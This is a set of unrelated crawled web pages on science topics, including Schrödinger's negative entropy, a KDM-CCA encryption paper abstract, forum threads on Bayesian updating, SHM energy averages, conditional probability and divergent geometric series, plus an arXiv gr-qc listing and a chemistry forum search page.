In animate thermodynamics, negative entropy is a mathematical synonym for order, in an entropic sense. The term comes from Austrian physicist Erwin Schrödinger's famous 1944 booklet What is Life?, wherein he tried to explain the second law to a lay audience, stating that negative entropy is the amount of order that an organism "sucks from its environment" as it lives or "avoids decay to thermodynamical equilibrium or of maximum entropy". [1] Mathematics The idea that the verbal expression 'negative entropy' is synonymous with 'order' stems from a combination of the following three expressions: $\frac{1}{X} = X^{-1} \,\!$ Rule for inverse functions $\log(a^b) = b \log(a) \,\!$ Rule for logarithms $S = k \log W \!$ Entropy expression from statistical mechanics. In short, Schrödinger equates the multiplicity W of the Boltzmann entropy equation with disorder, pure and simple, which he reasons applies to all systems; he then equates the inverse of multiplicity with order, as in: $W^{-1} = Order \,\!$ and carries the negative sign over to the left side of the statistical entropy expression, using the rule for logarithms, to argue that negative S equals order. Derivation In his 1944 book What is Life?, Schrödinger reasoned that it is not the energy that living beings feed on that keeps them from decay, but "negative entropy". In rephrasing this statement, he says "the essential thing in metabolism is that the organism succeeds in freeing itself from all the entropy it cannot help producing while alive." In making these ball-park statements, Schrödinger calls on the statistical concepts of order and disorder, connections that were revealed, as he says, by the investigations of Boltzmann and Gibbs in statistical physics. On this basis, he situates the following definition: $\text{entropy} = k \log D \,\!$ where k is the Boltzmann constant and D, he says, is a "quantitative measure of the atomistic disorder of the body in question". Here, it should be noted, Schrödinger fails to mention that this expression is generally valid only for ideal gases. In any event, Schrödinger reasons that this statistical expression applies to living organisms. Moreover, to make his verbal argument mathematical, he states that "if D is a measure of disorder, its reciprocal, 1/D, can be regarded as a direct measure of order." In addition, "since the logarithm of 1/D is just the minus of the logarithm of D, we can write Boltzmann's equation thus:" $-(\text{entropy}) = k \log (1/D) \,\!$ or, equivalently, $-S = k \log (1/D) \,\!$ Hence, as Schrödinger states: "The awkward expression negative entropy can be replaced by a better one: entropy, taken with the negative sign [ – entropy], is itself a measure of order." Thus, he concludes, "the device by which an organism maintains itself stationary at a fairly high level of orderliness", a state he equates with a low level of entropy, consists in "sucking orderliness from its environment". Negentropy In 1953, through the guise of information theory, Schrödinger's negative entropy usage was shortened into the term "negentropy" by French physicist Léon Brillouin. [2] Difficulties After his lecture, wherein he discussed negative entropy, Schrödinger famously had to add a note to Chapter 6, where he explains that: "My remarks on negative entropy have met with doubt and opposition from physicist colleagues." He goes on to explain that had he been lecturing to them, he would have turned the discussion to free energy instead, but judged the concept too intricate for the lay audience. In a 1946 review of Schrödinger's What is Life?, author H.J.
Muller stated, supposedly, that biologists had in the previous decades commonly defined negative entropy as "potential energy". [3] Muller, it seems, is referring here to Schrödinger's note on free energy. When the concept of negative entropy is taken literally and measured in actual organisms, it loses its meaning, and the discussion tends to shift to free energy instead. [4]
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 4, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8068132400512695, "perplexity": 1988.2447456649224}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320303385.49/warc/CC-MAIN-20220121131830-20220121161830-00002.warc.gz"}
https://www.iacr.org/cryptodb/data/paper.php?pubkey=29161
## CryptoDB ### Paper: A Framework for Achieving KDM-CCA Secure Public-Key Encryption Authors: Fuyuki Kitagawa Keisuke Tanaka DOI: 10.1007/978-3-030-03329-3_5 Search ePrint Search Google Slides ASIACRYPT 2018 We propose a framework for achieving a public-key encryption (PKE) scheme that satisfies key dependent message security against chosen ciphertext attacks (KDM-CCA security) based on projective hash function. Our framework can be instantiated under the decisional diffie-hellman (DDH), quadratic residuosity (QR), and decisional composite residuosity (DCR) assumptions. The constructed schemes are KDM-CCA secure with respect to affine functions and compatible with the amplification method shown by Applebaum (EUROCRYPT 2011). Thus, they lead to PKE schemes satisfying KDM-CCA security for all functions computable by a-priori bounded size circuits. They are the first PKE schemes satisfying such a security notion in the standard model using neither non-interactive zero knowledge proof nor bilinear pairing. The above framework based on projective hash function captures only KDM-CCA security in the single user setting. However, we can prove the KDM-CCA security in the multi user setting of our concrete instantiations by using their algebraic structures explicitly. Especially, we prove that our DDH based scheme satisfies KDM-CCA security in the multi user setting with the same parameter setting as in the single user setting. ##### BibTeX @inproceedings{asiacrypt-2018-29161, title={A Framework for Achieving KDM-CCA Secure Public-Key Encryption}, booktitle={Advances in Cryptology – ASIACRYPT 2018}, series={Lecture Notes in Computer Science}, publisher={Springer}, volume={11273}, pages={127-157}, doi={10.1007/978-3-030-03329-3_5}, author={Fuyuki Kitagawa and Keisuke Tanaka}, year=2018 }
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2942115068435669, "perplexity": 5227.253244769945}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057558.23/warc/CC-MAIN-20210924140738-20210924170738-00243.warc.gz"}
https://stats.stackexchange.com/questions/424702/does-order-of-events-matter-in-bayesian-update
# Does order of events matter in Bayesian update? I'm wondering whether the order of events can lead to different Bayesian update. For example, consider a coin-tossing problem with unknown $$p$$, the probability of Head. Initially, $$p$$ is known to follow some beta distribution: $$p\sim Beta(a_0,b_0).$$ Suppose that we have a sequence of observations that do not have to be an outcome of coin-tossing. For example, the first observation is "$$\mathbb E[p]>\frac{1}{2}$$" while the second observation is "Head". If I want to update $$p$$ using Baye's rule, it will be a lot easier if I can process the second event first and then the first event later as Beta is a conjugate prior of binomial experiments. However, if I have to update $$p$$ in the order of the events (first observation first, and then the second one later), the process requires a bit more of computation. So, my question is that does the order of events matter in Bayesian updating? If not, what can be a theoretical background that justifies it? • How can you observe that "$\mathbb E[p]>\frac{1}{2}$"? Nov 28, 2019 at 1:37 AFAIK, you cannot say that $$p > \frac{1}{2}$$ or even $$\mathbb E[p]>\frac{1}{2}$$ is an "observation" or "event", but rather a constraint on your model parameter(s). The term "observation" is usually reserved for specific realizations of a random variable (i.e. draws from a distribution). In your model, one could plausibly observe $$p$$ (numbers between 0 and 1) or the outcomes of $$Bernoulli(p)$$ (either 0 or 1). There is no way to observe $$\mathbb E[p]>\frac{1}{2}$$, this information lies outside your probabilistic model. As a rough rule (some caveats apply) you should be able to simulate observations from your probabilistic model, given model parameters. How would you simulate a model where $$\mathbb E[p]>\frac{1}{2}$$ is a possible observation? If you start with the $$p\sim Beta(a_0,b_0); a_0, b_0 \in \mathbb{R}^+$$ model and then learn that $$\mathbb E[p]>\frac{1}{2}$$, it means your initial model was incorrect and you should change your model to reflect the constraint ($$\mathbb E[p]>\frac{1}{2}$$ implies $$\frac{a_0}{a_0 + b_0} > \frac{1}{2}$$, so some combinations of $$a_0$$ and $$b_0$$ are ruled out). Adding a constraint cannot be AFAIK directly handled in the language of Bayesian updating. Hope that helps. • Thank you for your comment, @Martin Modrak. I got your point. I modified the question. What happens if the first obvservation is $\mathbb E[p]>\frac{1}{2}?$ Within the model with the Beta conjugate, there are infinitely many possibilities that can draw $\mathbb E[p]>\frac{1}{2}$. In that case, are the two events interchangable? Sep 4, 2019 at 2:55 • @Andeanlll I don't think $\mathbb E[p]>\frac{1}{2}$ can be treated as an observation either. I tried to expand my answer on that. Sep 4, 2019 at 5:19 In Bayesian inference, terms like "observation" and "event" are just conveniences; there is no fundamental importance to them, so don't get hung up on them. In particular, there is no physical causality or time's arrow -- no "events". Whether you can carry out some calculations in more than one order depends solely on the form of the model. If, algebraically, the results are the same assuming different orders of assignments to some variables (i.e., "observations"), then, terrific, you can do whatever is convenient. If not, well, so what? About the representation of p > 1/2, you could represent that as a likelihood function which is just a step at 1/2. 
That is, it is zero to the left of 1/2, and any positive constant to the right. Note that ordinary "observations" yield likelihood functions which vary smoothly, but the smoothness is not a requirement. In order for this to be the case, the random variables must be exchangeable. Your example is a little different since $$p>1/2$$ isn't an event. An event should be in the support of the likelihood. In this case, events are only constituted by binomial random variables, or sums thereof.
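To illustrate the exchangeability point numerically (this example is mine, not from the thread, and it covers only genuine coin-toss observations, where conjugate updating applies; the "$$\mathbb E[p]>\frac{1}{2}$$" item is a constraint on the model, not data): with a Beta prior and Bernoulli observations the posterior depends only on the counts of heads and tails, so processing the tosses in any order gives the same answer.

```python
# Beta-Bernoulli updating is order-invariant: the posterior depends only on
# the head/tail counts, not on the sequence in which the tosses arrive.
from itertools import permutations

def beta_update(a, b, tosses):
    """Sequentially update a Beta(a, b) prior with 0/1 coin tosses."""
    for t in tosses:
        a, b = a + t, b + (1 - t)
    return a, b

a0, b0 = 2.0, 3.0
data = (1, 0, 1, 1, 0)
posteriors = {beta_update(a0, b0, order) for order in permutations(data)}
print(posteriors)   # a single element: every ordering gives the same Beta(5, 5)
```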
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 19, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.909518301486969, "perplexity": 378.88779250514403}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652663012542.85/warc/CC-MAIN-20220528031224-20220528061224-00149.warc.gz"}
https://www.physicsforums.com/threads/shm-energies.211961/
# SHM energies

1. Jan 30, 2008

In SHM, the average kinetic energy taken with respect to time equals the average potential energy taken with respect to time. But today in class, when my teacher asked me to prove that average K.E. = average P.E., I tried integrating with respect to displacement and then dividing by A, thinking this would give the average energies over a quarter vibration, and since all four quarters are identical the overall average should be the same. Instead I found that average K.E. = 2 × average P.E. When I redid the calculation with respect to time I got the expected answer, but I am still confused about how average K.E. = 2 × average P.E. can come out of the displacement average.
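A short derivation (added here; it is not part of the original thread) shows where the factor of 2 comes from, using the standard SHM relations. With $$x=A\sin\omega t$$, the potential and kinetic energies are $$U=\tfrac12 m\omega^2x^2$$ and $$K=\tfrac12 m\omega^2(A^2-x^2)$$.

Averaging over time, $$\langle\sin^2\omega t\rangle_t=\tfrac12$$, so
$$\langle U\rangle_t=\tfrac14 m\omega^2A^2=\langle K\rangle_t.$$
Averaging over displacement on a quarter cycle $$0\le x\le A$$,
$$\langle U\rangle_x=\frac1A\int_0^A\tfrac12 m\omega^2x^2\,dx=\tfrac16 m\omega^2A^2,\qquad
\langle K\rangle_x=\frac1A\int_0^A\tfrac12 m\omega^2(A^2-x^2)\,dx=\tfrac13 m\omega^2A^2=2\,\langle U\rangle_x.$$
The two averages disagree because the oscillator spends more time near the turning points (large $$|x|$$) than a uniform weighting in $$x$$ assumes, so a displacement average is not the same thing as a time average.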
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9540147185325623, "perplexity": 2835.106504049171}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218189474.87/warc/CC-MAIN-20170322212949-00112-ip-10-233-31-227.ec2.internal.warc.gz"}
https://aps.arxiv.org/list/gr-qc/1712?skip=100&show=25
# General Relativity and Quantum Cosmology ## Authors and titles for Dec 2017, skipping first 100 [ total of 423 entries: 1-25 | 26-50 | 51-75 | 76-100 | 101-125 | 126-150 | 151-175 | 176-200 | ... | 401-423 ] [ showing 25 entries per page: fewer | more | all ] [101] Title: Gravitational-wave luminosity of binary neutron stars mergers Journal-ref: Phys. Rev. Lett. 120, 111101 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Astrophysical Phenomena (astro-ph.HE) [102] Title: Probing the universality of synchronised hair around rotating black holes with Q-clouds Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Theory (hep-th) [103] Title: Cosmic acceleration from a single fluid description Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO); High Energy Physics - Theory (hep-th) [104] Title: Comment on "Construction of regular black holes in general relativity" Authors: K.A. Bronnikov Comments: 3 pages, no figures. arXiv admin note: text overlap with arXiv:1708.08125 Journal-ref: Phys. Rev. D 96 (12), 128501 (2017) Subjects: General Relativity and Quantum Cosmology (gr-qc) [105] Title: The quantum effect on Friedmann equation in FRW universe Journal-ref: AHEP 6758078(2018) Subjects: General Relativity and Quantum Cosmology (gr-qc) [106] Title: Stability of a black hole and the speed of gravity waves within self-tuning cosmological models Comments: 5 pages, no figure, RevTeX4 format; v2: correction of a sign mistake in Eq. (2), coming from Eq. (11) of Ref. [3], and of its numerical consequences, although our overall conclusions remain the same; and minor changes reflecting the version to appear in Phys. Rev. Lett Journal-ref: Phys. Rev. Lett. 120, 241101 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO) [107] Title: Black hole complementarity with the generalized uncertainty principle in gravity's rainbow Comments: 18 pages, 3 figures, version to appear in JCAP Journal-ref: JCAP, 02 (2018) 060 Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Theory (hep-th) [108] Title: Critical phenomena in the general spherically symmetric Einstein-Yang-Mills system Comments: 15 pages, 15 figures; v2: matches published version Journal-ref: Phys. Rev. D 97, 044053 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc) [109] Title: de Sitter geodesics in stereographic charts Authors: Ion I. Cotaescu Journal-ref: Mod. Phys. Lett. A Vol. 33, No 32 (2018) 1875002 Subjects: General Relativity and Quantum Cosmology (gr-qc) [110] Title: Self-acceleration in scalar-bimetric theories Journal-ref: Phys. Rev. D 97, 103516 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO) [111] Title: Decay of the de Sitter Vacuum Journal-ref: Phys. Rev. D 97, 065016 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO); High Energy Physics - Theory (hep-th) [112] Title: Waves on a vortex: rays, rings and resonances Journal-ref: J. Fluid Mech. 
857 (2018) 291-311 Subjects: General Relativity and Quantum Cosmology (gr-qc); Classical Physics (physics.class-ph); Fluid Dynamics (physics.flu-dyn) [113] Title: Localization of transient gravitational wave sources: beyond triangulation Subjects: General Relativity and Quantum Cosmology (gr-qc); Instrumentation and Methods for Astrophysics (astro-ph.IM) [114] Title: Vainshtein Screening in Scalar-Tensor Theories before and after GW170817: Constraints on Theories beyond Horndeski Comments: 7 pages, 1 figure. Added references, corrected inconsequential typos in eq. (3) and (4), added discussion on the third Vainshtein screening branch and improved constraints in the Note added Journal-ref: Phys. Rev. D 97, 101302 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Phenomenology (hep-ph) [115] Title: Note on the character of the generic rotating charged regular black holes in general relativity coupled to nonlinear electrodynamics Comments: 5 pages, 1 figure, submitted to Ragtime 19 proceeding Subjects: General Relativity and Quantum Cosmology (gr-qc) [116] Title: The dynamics of difference Authors: Lee Smolin Comments: Latex 15 pages, no figues, small improvements Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Theory (hep-th); Quantum Physics (quant-ph) [117] Title: Quantum phase space trajectories with application to quantum cosmology Comments: 11 pages, 4 figures, the new version contains improved discussions Journal-ref: Phys. Rev. D 98, 026030 (2018) Subjects: General Relativity and Quantum Cosmology (gr-qc); Mathematical Physics (math-ph); Quantum Physics (quant-ph) [118] Title: Self-gravitating $Λ$-media Comments: 17 pages+ 3 pdf figures. Expanded version published on JCAP Journal-ref: JCAP 1901 (2019) no.01, 057 Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO); High Energy Physics - Theory (hep-th) [119] Title: Spin and maximal acceleration Authors: Giorgio Papini Subjects: General Relativity and Quantum Cosmology (gr-qc) [120] Title: Emergent inflation from a Nambu--Jona-Lasinio mechanism in gravity with non-dynamical torsion Subjects: General Relativity and Quantum Cosmology (gr-qc); High Energy Physics - Phenomenology (hep-ph); High Energy Physics - Theory (hep-th) [121] Title: Quantum corrections to quartic inflation with a non-minimal coupling: metric vs. Palatini Subjects: General Relativity and Quantum Cosmology (gr-qc); Cosmology and Nongalactic Astrophysics (astro-ph.CO); High Energy Physics - Phenomenology (hep-ph) [122] Title: Planckian charged black holes in ultraviolet self-complete quantum gravity Authors: Piero Nicolini Comments: 15 pages, v2: version in press on Physics Letters B Journal-ref: Physics Letters B 778 (2018) 88-93 Subjects: General Relativity and Quantum Cosmology (gr-qc) [123] Title: A new inflationary Universe scenario with inhomogeneous quantum vacuum Authors: Yilin Chen, Jin Wang Subjects: General Relativity and Quantum Cosmology (gr-qc) [124] Title: Collapsing spherical star in Scalar-Einstein-Gauss-Bonnet gravity with a quadratic coupling
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24652855098247528, "perplexity": 5139.243596594977}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710734.75/warc/CC-MAIN-20221130092453-20221130122453-00251.warc.gz"}
https://www.physicsforums.com/threads/conditional-probability.626763/
# Conditional Probability 1. Aug 9, 2012 1. I am going over some past Probability exam papers and cannot solve this question. Any help or advice would be much appreciated! 2. David eats cereal for lunch 60% of days. If he had ice cream for breakfast, then the probability that he eats cereal for lunch is only 0.25. If he didn't eat ice cream for breakfast then he would not eat cereal for lunch with probability 0.3. (a) Are the events that David ate cereal for lunch and ice cream for breakfast independent? (b) Show that P(David has ice cream for breakfast)=2/9 3. I (think I) have been able to work out part (a): Let the event cereal for lunch be A and ice cream for breakfast be B. The events A and B are independant if P(A$\cap$B)= P(a)* P(B). So P(A given B)*P(B)= P(A)* P(B) which gives us P(A given B)= P(A) and then when we sub in the values given in the question we get 0.25= 0.6 which is not true and thus proves they are not independent. Is this correct? For part b I have been using the partition theorem to try to show that P(B)=2/9. So P(B)= P(B given A)*P(A)+ P(B given Ac)*P(ac) which gives me P(B)*(0.75)=. And this is as far as I can get because I cannot work out how to find P(B$\cap$Ac)?? More than likely I have gone completely wrong from the very beginning. Any help would be very much appreciated please! Thank you:) 2. Aug 9, 2012 ### Ray Vickson I prefer to use a notation where the meaning of the symbols is apparent at once, so let I = {ice cream for breakfast} and C = {cereal for lunch}. You are given P(C) = 0.6 = 3/5, P(C|I) = 0.25 = 1/4 and P(Cc|Ic) = 0.3 = 3/10. Thus, P(C|Ic) = 7/10. Since P(C|I) and P(C|Ic) are different, C and I are dependent, as you said. P(C) = P(C & I) + P(C & Ic) = P(C|I)P(I) + P(C|Ic)P(Ic), and P(Ic) = 1-P(I). You can solve for P(I). RGV 3. Aug 9, 2012 Thank you! You have been very helpful Similar Discussions: Conditional Probability
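As a quick check of Ray Vickson's setup (an addition, not part of the thread), the partition identity can be solved for $\mathbb P(I)$ with exact fractions:

from fractions import Fraction

P_C      = Fraction(3, 5)    # P(C), cereal for lunch
P_C_I    = Fraction(1, 4)    # P(C | I), given ice cream for breakfast
P_C_notI = Fraction(7, 10)   # P(C | I^c) = 1 - 0.3

# P(C) = P(C|I) p + P(C|I^c) (1 - p), solved for p = P(I)
p = (P_C - P_C_notI) / (P_C_I - P_C_notI)
print(p)              # 2/9, as required in part (b)
print(P_C_I == P_C)   # False, so C and I are not independent (part (a))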
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8259921073913574, "perplexity": 1280.9442413143338}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948512584.10/warc/CC-MAIN-20171211071340-20171211091340-00453.warc.gz"}
https://brilliant.org/discussions/thread/how-is-that-possible/
× # How is that possible?? This discussion has been deleted! Note by Atul Shivam 1 year, 4 months ago Sort by: I guess that you cannot let $$S=1+2+4+8+16+\ldots \infty$$ because the sum of the geometric progression does not converge (approaches infinity). Also, you cannot subtract equation $$(2)$$ with $$(1)$$ because both $$S$$ and $$2S$$ do not exist. · 1 year, 4 months ago I think you mean to say ,we can't find sum of geometric progression which converges to infinity!!! Is it so ??? · 1 year, 4 months ago Yes sorry for not being clear. · 1 year, 4 months ago Got a reason. If S is infinity. Then 2*infinity is also infinity. This means there will be nothing like 2S for infinity.Also you can't apply operations like addition or subtraction etc to infinity. If you will say that assuming n terms where n tends to infinity and apply operations. Then the result will be something which is likely to be. · 1 year, 4 months ago Before writing the statement "S is equal to.." you must prove the convergence of the series. If the series converges, then only it has a limiting value, which you may call S. If you assume that S exists before proving its existence, then anomalous results as the above may pop up. Here the series does not converge (rather it diverges) simply because its the sequence of its partial sums is not bounded. · 1 year, 2 months ago It looks like to be on the same pattern as we derive formula for infinite sum of G.P. But there was |r| < 1. We can't use this pattern in such case where |x| > 1. Because the terms are increasing at a large rate and uncertainty of one last infinitely large term may result in false value. · 1 year, 4 months ago I don't think so as we can add or subtract anything to infinity and it will not affect anything · 1 year, 4 months ago For |x|> 1 G.P. diverges. So, sum can't be found. · 1 year, 4 months ago What do you want to say, Can you please elaborate · 1 year, 4 months ago Well, i just want to say that infinity doesn't follow elementary operations. I need some time to give a proper explanation. I am very sorry that i couldn't explain it. · 1 year, 4 months ago Oh!!! Is it so · 1 year, 4 months ago Uncertainty of one term may result in this false value. Because if you get to same approach by using sigma instead of value. You will get the desired result. Explain me if you know the exact reason. · 1 year, 4 months ago Because infinite does not follow general Algebraic rule of operations(+,-,x,÷). · 1 year, 4 months ago Hey are you still in ISM dhanbad ??? · 1 year, 4 months ago Let us take an another geometric progression $$T_n= 1,\frac {1}{2},\frac {1}{4},\frac {1}{8},\frac {1}{16}......$$ and let $$S$$ be it's sum I.e $$S= (1+\frac {1}{2}+\frac {1}{4}+\frac {1}{8}+\frac {1}{16}......)----(1)$$ $$(2S =2+1+\frac {1}{2}+\frac {1}{4}+\frac {1}{8}+\frac {1}{16}......)----(2)$$ Now $$2S-2= (1+\frac {1}{2}+\frac {1}{4}+\frac {1}{8}+\frac {1}{16}......)$$ $$2S=4$$ and hence $$S= 2$$ which is absolutely correct as $$S$$ has actual value of $$+2$$. Why it seems to be correct and not the above one sorry for my poor English I am not very much fluent $$:-)$$ · 1 year, 4 months ago That's what I said earlier your procedure is correct when S is finite but same thing is not applicable when S is infinite because the value of $$\displaystyle \infty - \infty$$ cannot be determined. I am in 1st year of college(my age is 18). · 1 year, 4 months ago I was just asking because I am in the same city:) · 1 year, 4 months ago
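A small numerical illustration (added; it is not from the discussion) of the point being made: the shift-and-subtract trick is only meaningful when the partial sums converge.

def partial_sums(r, n_terms):
    total, sums = 0.0, []
    for k in range(n_terms):
        total += r ** k
        sums.append(total)
    return sums

print(partial_sums(2, 10))    # 1, 3, 7, 15, ... grows without bound: no finite S exists
print(partial_sums(0.5, 10))  # 1.0, 1.5, 1.75, ... approaches 2: here the trick is valid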
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.965385913848877, "perplexity": 722.8639018945985}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00619-ip-10-171-10-108.ec2.internal.warc.gz"}
https://lavelle.chem.ucla.edu/forum/search.php?author_id=12480&sr=posts
## Search found 35 matches Wed Jun 13, 2018 11:48 am Forum: *Molecular Orbital Theory (Bond Order, Diamagnetism, Paramagnetism) Topic: Drawing orbitals [ENDORSED] Replies: 1 Views: 147 ### Drawing orbitals[ENDORSED] Does anyone know if we are expected to know how to draw d orbitals? I know we learned how to do s and p really well but I am unsure about d. Thanks. Sat Jun 09, 2018 11:21 am Forum: Calculating pH or pOH for Strong & Weak Acids & Bases Topic: 12.49 Replies: 3 Views: 187 ### 12.49 Does anyone know if for questions like 12.49 on the final, 12.49 Which is the stronger base, the hypobromite ion, BrO , or morphine, C17H19O3N? Justify your answer will we be given the pKb values? Thanks. Sat Jun 09, 2018 11:05 am Forum: Calculating pH or pOH for Strong & Weak Acids & Bases Topic: 12.19 Replies: 1 Views: 166 ### 12.19 Hello, I am struggling to understand question 12.19 from the textbook, The concentration of HCl in hydrochloric acid is reduced to 12% of its initial value by dilution. What is the difference in the pH values of the two solutions? The answer says that pH will increase by 0.92 but how do we calculate... Fri Jun 08, 2018 6:08 pm Forum: Identifying Acidic & Basic Salts Topic: Final Replies: 3 Views: 240 ### Final Does anyone know if we have to know the enthalpy changes for the breakdown formulas of acids (H-A) like written in section 12.9 on page 481? Thanks. Sun Jun 03, 2018 3:03 pm Forum: Determining Molecular Shape (VSEPR) Topic: Textbook 4.21 part d Replies: 3 Views: 109 ### Textbook 4.21 part d Hello, during discussion section my TA told us that we do not need to know specific angles for things besides the 6 basic structures if they were all bonded electron pairs. However, the answer to this problem in the solutions manual is 107 ^{\circ} for the N2H4 molecule. Do we have to be able to wri... Sat Jun 02, 2018 9:41 pm Forum: Shape, Structure, Coordination Number, Ligands Topic: Final Replies: 5 Views: 175 